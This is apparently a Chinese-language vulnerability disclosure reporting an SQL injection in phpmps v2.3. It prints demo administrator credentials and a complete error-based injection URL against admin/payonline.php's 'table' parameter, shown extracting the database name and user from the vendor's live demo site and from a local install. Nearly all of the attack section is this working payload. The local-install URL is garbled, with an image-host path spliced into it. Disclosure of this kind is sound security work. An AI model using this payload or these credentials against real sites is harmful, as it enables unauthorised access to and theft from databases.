### 简要描述:
phpmps通用SQL注入(demo测试成功)
### 详细说明:
版本下载地址:
http://www.phpmps.com/down/phpmps_v2.3_build140305_utf8.zip
[<img src="https://images.seebug.org/upload/201407/101519046a1565bda45f6e7e546e8eecba35a2f9.jpg" alt=".jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/101519046a1565bda45f6e7e546e8eecba35a2f9.jpg)
http://www.phpmps.com/demo/admin/login.php
使用admin/gxy123123登录成功:
SQL注入EXP:
http://www.phpmps.com/demo/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(database(),0x7c,user(),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
[<img src="https://images.seebug.org/upload/201407/10154023eb48a6ef6c4f36f4a1609f1411383396.jpg" alt="payonline注入.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/10154023eb48a6ef6c4f36f4a1609f1411383396.jpg)
### 漏洞证明:
本地搭建环境,同样成功:
http://localhost/phpmps_v2.3_build140305_utf8https://images.seebug.org/upload/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(database(),0x7c,user(),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
[<img src="https://images.seebug.org/upload/201407/10154317af14d03575764f7182435342dd2fb648.jpg" alt=".jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/10154317af14d03575764f7182435342dd2fb648.jpg)
京公网安备 11010502034610号
暂无评论